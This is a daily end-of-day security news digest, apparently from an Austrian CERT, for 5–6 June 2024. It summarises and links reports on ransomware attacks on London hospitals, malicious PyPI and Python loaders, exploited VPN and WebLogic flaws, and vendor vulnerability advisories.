Tageszusammenfassung - 06.06.2024

End-of-Day report

Timeframe: Mittwoch 05-06-2024 18:00 - Donnerstag 06-06-2024 18:00 Handler: Alexander Riepl Co-Handler: Thomas Pribitzer

News

Qilin ransomware gang linked to attack on London hospitals

A ransomware attack that hit pathology services provider Synnovis on Monday and impacted several major NHS hospitals in London has now been linked to the Qilin ransomware operation.

https://www.bleepingcomputer.com/news/security/qilin-ransomware-gang-linked-to-attack-on-london-hospitals/

Linux version of TargetCompany ransomware focuses on VMware ESXi

Researchers observed a new Linux variant of the TargetCompany ransomware family that targets VMware ESXi environments using a custom shell script to deliver and execute payloads.

https://www.bleepingcomputer.com/news/security/linux-version-of-targetcompany-ransomware-focuses-on-vmware-esxi/

Brute Force Attacks Against Watchguard VPN Endpoints, (Wed, Jun 5th)

If you have a pulse and work in information security (or are a new scraping script without a pulse), you have probably seen reports of attacks against VPN endpoints. Running any VPN without strong authentication has been negligent for years, but in recent times, ransomware gangs, in particular, picked them off pretty quickly.

https://isc.sans.edu/diary/rss/30984

Malicious Python Script with a "Best Before" Date, (Thu, Jun 6th)

The script purpose is classic: it will fetch a payload from a remote site, inject it in memory and start a new thread. Such payload are usually related to CobaltStike.

https://isc.sans.edu/diary/rss/30988

Hackers Target Python Developers with Fake "Crytic-Compilers" Package on PyPI

Cybersecurity researchers have discovered a malicious Python package uploaded to the Python Package Index (PyPI) repository thats designed to deliver an information stealer called Lumma (aka LummaC2).

https://thehackernews.com/2024/06/hackers-target-python-developers-with.html

Prevent Account Takeover with Better Password Security

Tom works for a reputable financial institution. He has a long, complex password that would be near-impossible to guess. He-s memorized it by heart, so he started using it for his social media accounts and on his personal devices too. Unbeknownst to Tom, one of these sites has had its password database compromised by hackers and put it up for sale on the dark web.

https://thehackernews.com/2024/06/prevent-account-takeover-with-better.html

7-year-old Oracle WebLogic bug under active exploitation

Experts say Big Red will probably re-release patch in an upcoming cycle.

https://www.theregister.com/2024/06/06/oracle_weblogic_vulnerability_exploited/

Exploitation of Recent Check Point VPN Zero-Day Soars

GreyNoise has observed a rapid increase in the number of exploitation attempts targeting a recent Check Point VPN zero-day.

https://www.securityweek.com/exploitation-of-recent-check-point-vpn-zero-day-soars/

Ransomware: FBI hat Zugriff auf 7000 LockBit-Schlüssel und macht Opfern Hoffnung

Der Kampf gegen Lockbit ist nach wie vor im Gange. Dank beschlagnahmter Schlüssel sollen nun weitere Opfer wieder auf ihre Daten zugreifen können.

https://heise.de/-9749844

Vulnerabilities

2024-06-04: Cyber Security Advisory -KNX Secure Devices FDSK Leak and replay attack

https://search.abb.com/library/Download.aspx?DocumentID=9AKK108464A0803&LanguageCode=en&DocumentPartId=&Action=Launch

Cisco Finesse Web-Based Management Interface Vulnerabilities

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew

Vulnerabilities Patched in Kiuwan Code Security Products After Long Disclosure Process

https://www.securityweek.com/vulnerabilities-patched-in-kiuwan-code-security-products-after-long-disclosure-process/